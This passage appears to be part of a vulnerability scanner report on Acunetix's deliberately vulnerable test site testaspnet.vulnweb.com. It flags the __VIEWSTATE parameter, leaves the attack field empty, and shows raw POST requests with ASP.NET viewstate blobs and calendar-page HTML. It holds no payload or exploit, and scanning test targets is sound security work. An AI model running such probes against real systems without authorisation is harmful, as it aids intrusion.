10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8356&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAo6suyNoIZGRkiKv3Lm0iPayadD17h1cZHolTwcM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKtsqeRCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA7Wuoa7jHOCooA4mRS5VcgqOn%2B5D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:09 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAo6suyNoIZGRkiKv3Lm0iPayadD17h1cZHolTwcM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKtsqeRCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA7Wuoa7jHOCooA4mRS5VcgqOn+5D" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:White" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8344&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBArq7AvtoIZGRksCBMdKZA0e0Rr7Tee7%2BMHo3HytE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK1hJ%2FACwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA5yqtfEiH3tFi1%2FZb0%2B5eO7jHKLb
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:53 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBArq7AvtoIZGRksCBMdKZA0e0Rr7Tee7+MHo3HytE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK1hJ/ACwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA5yqtfEiH3tFi1/Zb0+5eO7jHKLb" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:White" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" 